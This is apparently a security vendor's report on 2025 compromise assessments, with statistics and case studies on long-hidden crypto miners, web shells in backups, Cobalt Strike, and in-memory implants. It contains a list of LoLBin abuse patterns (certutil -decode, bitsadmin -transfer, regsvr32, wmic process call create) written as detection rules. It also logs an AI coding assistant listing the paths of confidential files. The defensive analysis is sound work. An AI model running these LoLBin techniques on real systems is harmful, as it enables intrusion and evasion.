    The following case study highlights the importance of timely detection and response to prevent incidents from escalating into high-severity events.

    Case study: Four-year-old crypto mining activity on domain controllers

    In May 2025, our compromise assessment experts identified three domain controllers on a customer network that were infected with malicious files. The files had remained hidden for almost four years. They were created in the C:\Windows\Fonts\Mysql directory, abusing its unique characteristic whereby only font files in this directory are visible to regular users. Files with the names nei.bat, dl1host.exe, bat.bat, cmd.bat, and a spoofed svchost.exe were found there. These files were created in June and July of 2021.

    Kaspersky Threat Intelligence confirmed that these files are part of a crypto-mining campaign called NSABuffMiner, which spreads via the SMB protocol by exploiting the EternalBlue (MS17-010) vulnerability. A patch was released for this vulnerability in March 2017, four years before the initial compromise. This was more than enough time to patch the systems. This underscores the importance of implementing effective patch management operations and staying informed through threat intelligence news feeds.

    Based on the organization’s request, the malicious files were collected along with a forensic image for analysis and revealed the following:

    • bat.bat and cmd.bat generate random IPs and scan them with a lightweight port scanner renamed taskhost.exe to locate live hosts with SMB port 445 and NetBIOS port 139 open and looking for vulnerable machines.
    • Discovered vulnerable IPs are handed to helper scripts named bat, poab.bat, load.bat, and loab.bat that execute the malware mance.exe, Eter.exe, and puls.exe to inject the malicious DLLs Eternalblue2.dll and Doublepulsar2.dll into lsass.exe and explorer.exe, enabling lateral movement.
    • Persistence is then established by creating scheduled tasks to execute the propagation and infection scripts, and services are created to execute the crypto miner, with the names MicrosoftMysql, MicrosoftFonts, and MicrosoftMSSql. Other scheduled tasks were also observed with the names At1 and At2 and created for the same purpose.
    • After successfully compromising the machine and installing the persistence mechanisms, a cleanup task is performed to delete temporary files and dropped malware.

    Because of the lack of proper monitoring and threat hunting procedures, the organization was unaware that a mining operation had been hijacking their resources for four years, running on their domain controllers.

    Unintentional malware preservation

    An issue that is frequently discovered during compromise assessment activities is that of web shells remaining or being restored on target systems. Based on data collected during 2025 compromise assessment engagements, 64% of web shell incidents were classified as high-severity findings, 7% as low-severity (possibly legitimate files, but potentially compromised), and 29% as medium-severity findings requiring eradication.

    Web shell incident distribution by severity (download)

    One way web shells persist is through infected backups. The distribution of discovered incidents in our projects shows that 60% of the web shells were located on active systems, while 40% were stored in backups. Restoring such backups can reintroduce the threat long after the initial infection.

    Web shell location (download)

    Another common issue is asset inventory gaps, which were observed in 25% of engagements. This resulted in untracked devices, particularly cloud-only Linux web servers that are not joined to Active Directory, evading routine scans.

    Asset inventory issues (download)

    An attacker can plant a web shell on such a cloud server, and that server never appears in the inventory, though is still regularly backed up. As a result, the web shell may persist on the cloud server for a long time. If it is occasionally deleted, the backup server later restores the infected files, exposing the web shell to third parties again. This demonstrates that without a complete and up-to-date asset inventory, detection capabilities are significantly impaired.

    One case was observed in which the web shell was located on an internal file server (not a web server) within a .rar archive at the following path: D:\backup\[redacted_for_privacy].rar/wwwroot/<…>/[redacted_for_privacy].aspx

    During the investigation, the server administrators indicated that the folder had been copied from a different server that was offline at the time of the assessment. Because of poor asset inventory, the company’s security team did not detect the infection of this server. As a result of the backup procedure, the web shell was copied to the internal file server. Forensic analysis of the offline server revealed that the adversary had introduced a backdoor to the majority of the Windows servers in the environment, configuring the local administrator account with an identical password.

    The technique involved using PsExec to execute a .cmd script across all the servers listed in a .txt file; the script altered the local administrator password to a common value:

    Legitimate, yet suspicious: LoLBins and remote management tools

    In 2025, nonstandard remote management (RM) utilities were observed in all compromise assessment engagements. Living-off-the-land binaries (LoLBins) were also present in every engagement. These findings highlight the ongoing challenge for security operations centers (SOCs) that must distinguish between legitimate administrative use and malicious abuse.

    The observed remote management utilities span both proprietary platforms, such as TeamViewer and AnyDesk, and freely available tools, including PsExec, VNC servers, and open-source RM frameworks. These binaries are used daily in many environments for troubleshooting, software deployment, or remote support. However, the same capabilities – creating a new local admin account, copying files to a remote share, or launching a network port scan for diagnostics – are also typical of attacker post-exploitation activity. Our analysts frequently encounter cases where a legitimate sysadmin action resembles a lateral movement step. This makes the mere fact that “a remote management tool was executed” insufficient to classify it as an incident. Instead, the incident must be judged against an organization-specific baseline of expected usage. Establishing that baseline requires a deep, contextual understanding of who is authorized to run the tool, from which endpoints, and under which circumstances – a resource-intensive process on a case-by-case basis.

    LoLBins, binaries that are part of the operating system or commonly installed utilities (such as certutil, bitsadmin, regsvr32, and wmic), were also present in every assessment. While these files are trusted system components, threat intelligence confirms they are often repurposed for lateral movement, data exfiltration, and persistence. The graph below shows the severity distribution for incidents involving riskware or a LoLBin binary. The relatively high share of medium- (40%) and high-severity (31%) findings underscores that misuse of legitimate utilities is often the vector that enables a compromise to progress beyond the initial foothold.

    Severity distribution of incidents involving riskware or LoLBin involvement (2025) (download)

    To address the potential use of LoLBins and remote management tools by attackers, we recommend a multi-layered approach that goes beyond static deny lists:

    1. Formalize a policy that enumerates the remote management tools authorized for use. The policy must be coupled with a requirement to forward software operational logs to a central log management platform (SIEM or dedicated log collector). Continuous monitoring of these logs enables a SOC to detect deviations from authorized usage patterns.
    2. Periodically perform a software inventory audit to identify unauthorized remote management tools. Consider collecting data from the following registry keys on all hosts:
      • HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall
      • HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall
      • HKEY_USERS\*\Software\Microsoft\Windows\CurrentVersion\Uninstall
      • HKEY_USERS\*\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
    3. Enrich the hashes (MD5/SHA-256) of every executed binary with a functional category, such as “Remote Access”, “Golden Image”, or “Security Software.” Correlating the category with the execution path makes it possible to hunt for instances where a “Remote Access” binary runs from a non-standard location, such as %TEMP% or a user’s Downloads folder.
    4. Deploy detection rules that capture known LoLBin abuse patterns, such as certutil -decode, bitsadmin -transfer, regsvr32 -i <dll>, wmic process call create. These rules should be continuously baselined against the organization’s normal activity. The baseline is derived from a period of verified legitimate use and refreshed whenever new legitimate use cases emerge. Alerts are generated only when observed behavior diverges from the established norm, thereby reducing noise while preserving sensitivity to genuine abuse.
    Impact of not having continuous monitoring and proactive threat hunting

    Analyses of recent compromise assessment projects reveal a systematic blind spot in organizations that follow the security-by-purchase model to defend their networks. Without continuous human monitoring or a dedicated threat hunting program, the severity profile of detected incidents becomes heavily skewed toward a higher impact:

    Incident severity breakdown, where 24/7 monitoring or threat hunting is absent Control type Low-severity Medium/high-severity No continuous monitoring 14% 86% No threat hunting 16% 84%

    Often, the problem is not a lack of tools, but rather a lack of operational use of those tools. Many enterprises deploy next-generation security solutions and then let them run in “set-and-forget” mode, or they rely exclusively on an alert-driven workflow. The following issues are common in such organizations:

    • Alert fatigue: high false positive rates drown analysts in noise, forcing them to triage superficial indicators rather than conduct deep, contextual investigations.
    • Fragmented analyst assignment: without a dedicated hunting team, the same analyst may be tasked with dozens of unrelated alerts, limiting the time available for the hypothesis-driven exploration required to uncover stealthy footholds.

    The practical consequence is that adversaries retain an extended dwell time, enabling continued lateral movement and data exfiltration before the organization becomes aware of the breach. This pattern represents a measurable risk exposure that translates directly into business impact. As the following example illustrates, merely purchasing security controls does not guarantee detection; continuous monitoring, regular alert validation, and structured threat hunting are essential to reduce dwell time and limit business impact.

    Case study: Secure by design without continuous monitoring

    The enterprise invested in security controls and assumed that the environment was secure by design. However, security controls require proper configuration, continuous tuning, and active monitoring to be effective. The tools had been installed, but no one was ensuring that the security controls were configured effectively, there was no analyst reviewing the alerts they produced, and no schedule existed to review the collected logs.

    The organization opted for Kaspersky’s Compromise Assessment service. Historical security logs were collected and investigated as part of the assessment procedures. The goal was simple: to determine what had really been going on in the network over the previous few months.

    Log analysis revealed clear evidence of malicious activity. Activities related to Impacket behavior were discovered that led to the deployment of Cobalt Strike and Mimikatz on several critical servers, including the domain controllers. These activities were three months old at the time of detection, and the enterprise was unaware of them because there was no effective 24/7 monitoring in place.

    Impacket is a collection of Python scripts for network protocols and low-level network packet manipulation. Attackers can abuse it to move laterally into the network. The following are examples of its artifacts detected in the network:

    The attacker used Impacket to execute a PowerShell command that downloaded an executable from a command-and-control server. This server was found to be associated with Cobalt Strike. Cobalt Strike is a post-exploitation tool that provides capabilities for remote command execution and lateral movement within a compromised network. The execution was set up via a scheduled task that attempted to masquerade as a legitimate Google Chrome update task.

    The timeline assessment confirmed the presence of a Mimikatz binary and a memory dump associated with the same incident on the compromised system, confirming that a credential theft operation had indeed taken place.

    The organization was completely unaware of the breach. The activity had gone undetected for three months because the deployed controls were never monitored. Upon learning of the findings, a full-scale incident response was initiated to eradicate the footholds, rotate credentials, and harden the security of the environment.

    Security controls are not self-sufficient. Deploying a firewall or an EDR solution does not automatically protect you. Without proper configuration, baseline tuning, and, most critically, continuous log monitoring and threat hunting, those controls become merely decorative. Always-on monitoring, either performed internally or delegated to an external managed security service, can turn weeks-old compromises into minutes-old alerts by correlating events, hunting for anomalous use of penetration testing or hacking tools, and escalating suspicious activity.

    Incident response action statistics

    An analysis of historical compromise assessment projects reveals a persistent discrepancy between the best practices described in incident response playbooks and the operational realities of executing them in unprepared, often legacy-affected environments. The figure below shows how frequently each response action was required during the initial response phase of a compromise assessment.

    Incident response actions required after compromise assessment (download)

    The distribution highlights three frequently observed patterns:

    • Forensic analysis accounts for the majority of cases, with around 59% requiring at least one forensic package collection and analysis.
    • Remote eradication, i.e., file or registry key removal, was reported in 39% of cases.
    • Plans evolve as the investigation proceeds; 39% of engagements required a mid-engagement plan update, reflecting the iterative nature of incident response.
    Why forensic collection is the default entry point

    Forensic package collection and analysis was the most frequent response action, occurring in 59% of cases. The prevalence of forensic package collection can be explained by two observable factors in CA engagements: (1) the targeted organization’s limited historical visibility and (2) the fact that a substantial proportion of incidents were older than 90 days at the start of the assessment. In many cases, native logs had already been rotated or purged, forcing investigators to rely on residual artifacts (e.g., MFT entries, registry hives, filesystem timestamps) to reconstruct timelines.

    Our observations suggest that remote forensic package collection is effectively a prerequisite rather than an optional convenience. The graph below summarizes the reported ability to collect forensic packages, categorized by incident severity level. It highlights that, in a significant proportion of high-severity cases, the affected organization lacked this capability.

    The organization’s ability to collect forensic data by incident severity (download)

    Containment: The remove files/registry keys paradox

    Response execution and eradication actions, such as file or registry key removal (reported in 39% of cases), were also common. However, they highlighted a notable gap in execution practices. While many organizations reported having EDR capabilities for remote removal, execution was often delegated to IT teams or MSPs via ticketing systems. This can introduce delays and reduce the precision of the removal process. Malware removal is a surgical process, particularly in multi-stage, fileless, or persistence-heavy scenarios. Capability alone is insufficient without expertise, sequencing, and planning, especially when artifacts may exist in shadow copies, backups, hidden paths, or downloader chains.

    Communication failures: An additional operational overhead

    A notable organizational finding emerged regarding communication. In 32% of projects, internal communication issues at the assessed organization materially impacted response execution. Below are the typical blockers:

    • Unclear action confirmation – system administrators could not quickly confirm whether a suspicious file was legitimate.
    • Delayed owner validation – ticket escalations stalled while waiting for system owners to respond.
    • Compromised communication channels – email accounts or ticketing portals may already be under the attacker’s control in the event of a suspected domain compromise.
    • Staff turnover – loss of knowledge about historical configuration baselines.

    These findings suggest that regular tabletop exercises are required to test not only technical playbooks, but also human and communication workflows, as well as operational level agreements that govern and facilitate communication between different teams, and standard operating procedures for proper documentation.

    The iterative nature of response plan updates

    The need to update response plans based on new analytical input arose in 39% of cases, emphasizing the inherently iterative nature of incident response. Early-stage plans cannot realistically account for all variables. Examples of the most commonly observed causes for updating the response plan are listed below:

    • Reverse engineering results that reveal previously unknown command-and-control (C2) servers or behaviors.
    • Forensic discoveries, such as hidden scheduled tasks, shadow-copy artifacts, or dormant DLLs.
    • Traffic analysis outcomes that expose additional lateral movement paths.
    • Human constraints – unavailable system owners, changes in management processes, or supervisor approval.

    Based on our experience, teams that treat the IR plan as a living document – incorporating each new artifact, reprioritizing actions, and reissuing the playbook before the next containment step – reduce the risk of missed eradication steps. Conversely, strict adherence to an initial, evidence-limited plan can increase the risk of overlooking persistent footholds.

    Distinguishing real attacker artifacts from penetration testing leftovers

    Finally, distinguishing attacker activity from penetration testing artifacts remained a recurring challenge (12% of cases). Compromise assessments frequently uncover remnants of legitimate testing tools, which can create uncertainty about whether a detected artifact originated from a malicious intrusion or a legitimate penetration test. Contributing factors:

    • Poorly documented penetration test report and artifact cleanup.
    • Overlapping toolsets (e.g., SharpHound) used by both red team operators and adversaries.
    • Running compromise assessments and active penetration testing projects simultaneously, which degrades analyst focus and increases false positive rates. Although correlating findings with penetration testing reports is essential, compromise assessments are human-driven investigative processes, and confusing analysts with overlapping “legitimate” attack signals leads to misinterpretation and weaker outcomes.
    Incident response maturity and its effect on severity

    Our data show a correlation between the presence of internal digital forensics or malware reverse engineering capabilities and the distribution of incident severity categories. Across the 2025 compromise assessment engagements, the distribution of low-, medium- and high-severity findings differed markedly between organizations that possessed these capabilities and those that did not. The data below illustrate this correlation and provide a basis for assessing the business value of expanding internal response skill sets.

    Incident severity split for cases requiring digital forensics, based on an organization’s capabilities (download)

    Organizations capable of analyzing digital forensic artifacts independently experienced half as many high-severity incidents and a higher proportion of low- and medium-severity cases.

    Incident severity split for cases requiring malware analysis, based on an organization’s capabilities (download)

    The presence of a dedicated reverse engineering resource correlates with a total absence of high-severity cases in our sample set; the majority of incidents were rated as medium severity, with a significant proportion of low-severity outcomes.

    The analysis of this correlation indicates, with medium confidence, that the observed shifts are unlikely to be caused solely by sample size effects. Rather, they are more likely to reflect a genuine operational phenomenon: internal digital forensics and malware analysis capabilities contribute not only to SOC processes, but also to cyber-resilience in general.

    Case study: In-memory LionTail infection on critical Windows servers

    During a compromise assessment, a persistent in-memory threat was identified on several critical servers. The activity was attributed to the LionTail framework, a sophisticated set of custom loaders and memory-resident shellcode implants. LionTail takes advantage of undocumented Windows HTTP.sys driver behaviors to covertly deliver and retrieve payloads via inbound HTTP traffic, effectively blending malicious activity into legitimate network flows.

    Several observed variants are attributed to the Scarred Manticore actor, which generates a unique implant per compromised host and performs data exfiltration while carefully masking command-and-control communications within normal-looking traffic.

    Detection was achieved through static memory signatures discovered within the scrcons.exe process. Although scrcons.exe is a legitimate WMI host binary located under C:\Windows\System32\wbem, it is frequently abused to host injected payloads, making it an attractive target for stealthy in-memory operations.

    The response plan comprised a number of actions, the most critical of which are highlighted below:

    • Collection of volatile memory dumps for in-depth analysis.
    • Acquisition of full forensic disk images from affected systems.
    • Detailed analysis of the collected artifacts and subsequent updates to the incident response plan.

    Executing these actions proved challenging for the organization because of its limited digital forensics and reverse engineering capabilities. In incidents dominated by fileless memory-resident threats, these capabilities are not optional – they are essential. Without them, organizations risk losing critical evidence, misjudging the scope of the compromise, or failing to fully eradicate advanced implants that leave minimal traces on disk.

    While our specialists were able to complete the investigation and contain the breach, the case revealed a readiness gap. It demonstrated the operational risk of depending on external assistance during high‑impact incidents and reinforced the necessity of in‑house forensic and reverse‑engineering maturity to achieve timely, confident and comprehensive incident handling.

    Solving the root cause problems

    Upon completion of a compromise assessment engagement, the focus shifts from incident response to a consulting phase. The final workshop focuses on preventing recurrence of incidents by identifying underlying deficiencies that allowed them to go unnoticed. The recommendations are actionable and tailored to the environment. For the purpose of this report, they have been grouped into a limited set of high-level categories.

    Root-cause category Share of incidents Typical findings Insufficient detection fidelity 60.7% • No high-confidence alerts were generated by the EPP/EDR or related log sources.
    • In 9.4% of cases, the product was mis-configured or out of date or malfunctioning. Missing alert-driven monitoring 35.9% • Alerts that could have indicated compromise were generated, but an incident was not declared.
    • Signals with high uncertainty (e.g., heuristic web shell detections) required analyst validation. Deficient vulnerability and configuration management 28.2% • Evident misconfigurations (e.g., disabled audit logging, over-permissive service accounts).
    • Known vulnerabilities left unpatched or unmitigated. Lack of structured threat hunting processes 27.4% • Low-fidelity alerts were never reexamined after initial dismissal.
    • High-volume telemetry remained unchecked due to staffing constraints. Inadequate security awareness programs 25.6% • Credential leaks from personal devices of employees or contractors accounted for 27.2% of incidents where inadequate security awareness was identified.
    • Social engineering attempts were successful because of insufficient user training. Absence of documented policies/processes 23.9% • No formal incident response playbooks, change management procedures or data handling guidelines were available. Common observations on root causes

    The detection health check was the most frequent corrective action. In more than half of the cases where alerts were missing, a simple verification of sensor health and rule relevance was recommended to fill the gap. Without such validation, immediate attribution of the failure to the product capability could not be made.
    Human analysis is still essential for low-confidence alerts. Automated pipelines alone cannot compensate for rules prone to false positives (e.g., generic web shell heuristics). Embedding a manual triage step was recommended to reduce the dwell time for incidents.

    Process hygiene (vulnerability management, threat hunting, security policies) accounts for a substantial proportion of the root causes. Even mature organizations exhibited gaps in routine activities that could be mitigated with disciplined workflows. The absence of documented policies/processes was the root cause of 23.9% of cases.

    A modern example of a policy gap is the use of generative AI development tools that operate without clear data handling rules. During one project, we identified a macOS workstation that executed the Claude Code (Anthropic) command-line assistant as a VS Code extension. The tool automatically captured filesystem snapshots to enrich its language model prompts. These snapshots included full directory listings and absolute paths to several Excel workbooks containing internal confidential data:

    Parent command line Command line /bin/zsh -c -l source /Users/[REDACTED]/.claude/shell-snapshots/snapshot-zsh-[REDACTED].sh && eval ‘ls -lh “/Users/[REDACTED]/Documents/[REDACTED]/”*.xlsx‘ \\< /dev/null && pwd -P >| /var/folders/[REDACTED]/claude-[REDACTED] ls -lh /Users/[REDACTED]/Documents/[REDACTED].xlsx /Users/[REDACTED]/Documents/[REDACTED].xlsx /Users/[REDACTED]/Documents/[REDACTED].xlsx .. [REDACTED]

    The organization was advised to conduct awareness sessions for employees on the risk of exposing confidential internal data to generative AI tools, and to develop a policy governing the use of such tools with confidential information.

    Lack of detections: Causes and impacts

    Compromise assessment engagements repeatedly show that insufficient detection fidelity is a significant contributing factor to high-severity incidents. In cases where the target organization’s detection coverage was rated low, 52% of incidents were classified as high severity and 15% as low severity. This suggests a correlation: limited visibility appears to increase the proportion of incidents that evolve into high-severity compromises.

    Incident severity distribution when detection coverage was insufficient (download)

    A common assumption is that engaging a managed security service provider (MSSP) improves detection maturity. The data, however, show a more nuanced picture. Even when an MSSP is engaged, 26.5% of incidents related to low detection coverage remain unidentified, and roughly 50% of MSSP-supported projects have basic Windows audit gaps (e.g., missing event log collection or disabled audit policies).
    These findings suggest that outsourcing alone does not guarantee effective detection; active governance and continuous validation are required. Detection should be treated as an evolving capability that requires continuous testing, measurement, and refinement, irrespective of whether it is managed internally or by a third party.

    Statistics of missed incidents due to lack of detection capability with or without MSSP (download)

    The analysis of root causes of missed detections reveals several recurring themes. In many environments, the technology is present but poorly operationalized. The main issues are:

    • Absence of endpoint protection platform (EPP) health check – nearly 50% of incidents escalated to high severity in engagements where the EPP health check was weak or absent. This reflects the classic “installed-but-not-enforced” risk, where agents are present but not tuned, updated, or validated.
    • Threat intelligence gaps – when there was no functional threat intelligence feed or platform, about half of the incidents reached high severity. Without curated indicators of compromise and contextual enrichment, analysts rely on generic alerts and may overlook known malicious behaviors.

    The underlying issue is an alert-driven, set-and-forget mindset: organizations assume that deployed tools will automatically protect them, even though the tools are not continuously tuned, validated, or enriched with threat intelligence.

    Incident severity breakdown where there was no EPP health check or threat intelligence Missing control High-severity Medium-severity Low-severity EPP health check 48.3% 36.7% 15% Threat intelligence feed 50% 40% 10%

    Detection failures are rarely caused by a single missing control; they emerge from weak configuration, insufficient telemetry, and an absence of regular checks of controls and processes to ensure they are functional, especially in outsourced models. A hybrid monitoring approach that combines internal ownership with external MDR or MSSP support consistently proves to be the most resilient model when roles, expectations, and performance metrics are clearly defined. Detection must be treated as a living function, not a procurement outcome.

    The following example illustrates the real-world consequences of control gaps by walking through a severe incident that persisted undetected for months simply because the organization lacked the necessary detection capabilities and security tools.

    Case study: In-memory PurpleFox infection evades conventional endpoint protection

    During a compromise assessment engagement, memory was scanned on the target hosts using the threat hunting rule set. Two hidden objects were identified:

    PurpleFox drops specially crafted DLLs and forces svchost.exe to load them. From there, it installs a kernel-mode driver that gives the attacker persistent and stealthy execution capabilities, as well as the ability to pull additional payloads. This results in the loading of the XMRig miner.

    The deployed EPP solution monitored file creation, registry modifications and network connections. However, its memory inspection module was disabled. Additionally, the signature set applied at the time of the assessment was not up to date. As a result, no alerts were generated for the injected DLLs or the miner’s shellcode. The compromise assessment team identified this detection gap during the memory analysis phase and documented the missing in-memory inspection capability in the final report.

    The organization’s security operations were outsourced to an MSSP, which collected the logs and forwarded them to the SIEM solution. Because the logs never contained alerts for in-memory activity, PurpleFox activity was not identified.

    Insufficient vulnerability management: A catalyst for high-severity compromises

    In the 2025 compromise assessment engagements, more than half of the threats identified and linked to insufficient vulnerability management practices or missing patches were classified as high severity. The most frequently observed consequences were the deployment of web shells that enabled persistent remote code execution and the exploitation of misconfigured Active Directory instances.

    Severity distribution of incidents due to improper vulnerability management (download)

    The root causes of missing patches are multifaceted. They include inadequate asset inventory management (25% of projects) and the absence of formal vulnerability management processes (41% of projects). Moreover, 86% of organizations that claimed to have a vulnerability management program still exhibited exploited misconfigurations during compromise assessment engagements. These findings suggest that robust patch management, comprehensive asset inventory practices, and structured vulnerability management processes are critical for preventing high-severity incidents.

    Case study: How overly permissive GPO-based software distribution goes wrong

    During multiple compromise assessment engagements, a high-impact misconfiguration was consistently observed: a Group Policy Object (GPO) was used to point to an executable in a shared folder and run it on every workstation via a scheduled task. The access control list (ACL) on the share was set to “Everyone – Full Control”.

    Given that any authenticated domain user can write to the share, an attacker who compromises a single low-privilege account can replace the legitimate binary with a malicious payload. The next scheduled task run propagates the payload automatically to all endpoints that receive the GPO. This provides:

    • Elevated execution context: the scheduled task typically runs under the SYSTEM or local administrator account.
    • Automatic lateral movement: the malicious binary propagates without requiring additional network exploitation.
    • Privilege escalation: a compromised low-privilege account can lead to domain administrator code execution.

    Vulnerability management procedures that include systematic GPO and share permission audits would have flagged the writeable ACL as a high-severity finding, enabling remediation before exploitation. Remediation typically involves restricting the share permissions to “Authenticated Users” with read-only access and limiting modifications to certain privileged accounts. Incorporating these checks into the baseline security controls reduces the attack surface, demonstrating the tangible risk reduction achievable through disciplined vulnerability assessment and penetration testing (VAPT) practices.

    Conclusion

    In 2025, Kaspersky Compromise Assessment helped organizations reveal a persistent detection gap: 30.8% of all incidents and 52% of high-severity compromises had historical activity spanning over three months. Of all the incidents discovered, 20% were found manually, while 60% were missed by enterprises because of the absence of high-confidence alerts from existing tools. The oldest missed incident identified by the Kaspersky Compromise Assessment team in 2025 was four years old.

    Post-incident checkups produced the highest percentage of high-severity findings, while regular proactive audits, compliance-driven audits, and audits performed before merging two networks tended to reveal issues earlier. This indicates that purely reactive investigations often miss hidden persistence. The top high-level recommendations for immediate improvement in 2025 for all projects were:

    • Run a comprehensive detection engine health check within 30 days of project closure, prioritizing telemetry integrity and rule relevance.
    • Introduce a Tier 1 alert validation team that reviews all low-confidence events on a defined schedule.
    • Ensure robust 24/7 monitoring augmented with threat hunting capabilities focused on baselining, low-fidelity alerts, and emerging adversary techniques.
    • Reevaluate the vulnerability management pipeline to ensure continuous patching and audit log activation across all critical assets.
    • Update security awareness curricula to address credential leakage from personal devices and reinforce secure BYOD practices.
    • Ensure periodic tabletop exercises are run to test technical playbooks and sharpen the team’s skills and communication workflows.
    • Establish operational-level agreements to govern and facilitate communication between different teams and standard operating procedures used for proper documentation.

    Addressing the root cause categories systematically will reduce the likelihood of future blind spots and improve the overall security posture of the engaged organizations.

    Alleged Scattered Spider hacker extradited to the United States

    Bleeping Computer - 12 hodin 6 min zpět
    A dual United States and Estonian citizen has been extradited to the U.S. to face charges alleging he was a member of the Scattered Spider hacking collective. [...]
    Kategorie: Hacking & Security
    Syndikovat obsah